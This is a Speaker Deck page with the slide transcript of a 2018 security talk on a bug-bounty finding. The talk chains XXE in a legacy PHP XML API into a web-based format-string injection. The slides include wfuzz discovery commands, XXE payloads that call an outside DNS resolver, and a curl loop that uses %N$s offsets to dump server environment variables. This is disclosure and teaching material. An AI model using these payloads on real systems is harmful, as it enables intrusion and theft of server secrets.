Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web based format injection, dumping memory like...
Search
Frans Rosén
September 19, 2018
Research
0
120
Web based format injection, dumping memory like it's 99 (or "Please help")
My lightning talk from Sec-T Stockholm in September 2018.
Frans Rosén
September 19, 2018
Tweet
Share
More Decks by Frans Rosén
See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
1.4k
Story of a RCE on Apple through hot jar swapping
fransrosen
0
1.2k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
270
A methodology using fuzzing and info disclosure
fransrosen
0
330
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
9.2k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
8.3k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
7.2k
Other Decks in Research
See All in Research
Cross-Media Information Spaces and Architectures
signer
PRO
0
230
20250502_ABEJA_論文読み会_スライド
flatton
0
170
Computational OT #1 - Monge and Kantorovitch
gpeyre
0
190
近似動的計画入門
mickey_kubo
4
980
AI エージェントを活用した研究再現性の自動定量評価 / scisci2025
upura
1
120
データサイエンティストの就労意識~2015→2024 一般(個人)会員アンケートより
datascientistsociety
PRO
0
710
公立高校入試等に対する受入保留アルゴリズム(DA)導入の提言
shunyanoda
0
5.9k
Pix2Poly: A Sequence Prediction Method for End-to-end Polygonal Building Footprint Extraction from Remote Sensing Imagery
satai
3
490
Adaptive Experimental Design for Efficient Average Treatment Effect Estimation and Treatment Choice
masakat0
0
130
NLP2025参加報告会 LT資料
hargon24
1
320
Streamlit 総合解説 ~ PythonistaのためのWebアプリ開発 ~
mickey_kubo
1
950
Weekly AI Agents News!
masatoto
33
68k
Featured
See All Featured
A better future with KSS
kneath
238
17k
Docker and Python
trallard
44
3.5k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
60k
Fantastic passwords and where to find them - at NoRuKo
philnash
51
3.3k
YesSQL, Process and Tooling at Scale
rocio
173
14k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
53
2.9k
Why Our Code Smells
bkeepers
PRO
336
57k
Build The Right Thing And Hit Your Dates
maggiecrowley
36
2.8k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
138
34k
The Straight Up "How To Draw Better" Workshop
denniskardys
234
140k
Testing 201, or: Great Expectations
jmmastey
43
7.6k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
18
970
Transcript
@fransrosen Web based format injection, dumping memory like it's 99
or "Please help"
@fransrosen Public Bug Bounty
@fransrosen RCE is 30,000 USD
@fransrosen Methodology • Found a domain not like the other
ones
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting
path: /cgi-bin/default/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen xml_api?
@fransrosen xml_api?
@fransrosen xml_api? YEAH! 👍
@fransrosen wtf!?
@fransrosen XXE!
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???
@fransrosen
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.
@fransrosen Format String Injection?
@fransrosen Format String Injection ON ZE WEB?
@fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen I can’t handle this shit
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Limitations 0x20-0xFF (no 0x22)
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Want to collaborate? @fransrosen
@fransrosen Questions? Suggestions?
fransrosen
signer
flatton
gpeyre
mickey_kubo
upura
datascientistsociety
shunyanoda
.png){kind=avatar}
satai
masakat0
hargon24
masatoto
kneath
trallard
lemiorhan
philnash
rocio
tammyeverts
bkeepers
maggiecrowley
eileencodes
denniskardys
jmmastey
sergeychernyshev
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_27.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_28.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_33.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_34.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_35.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_36.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_37.jpg){kind=link}
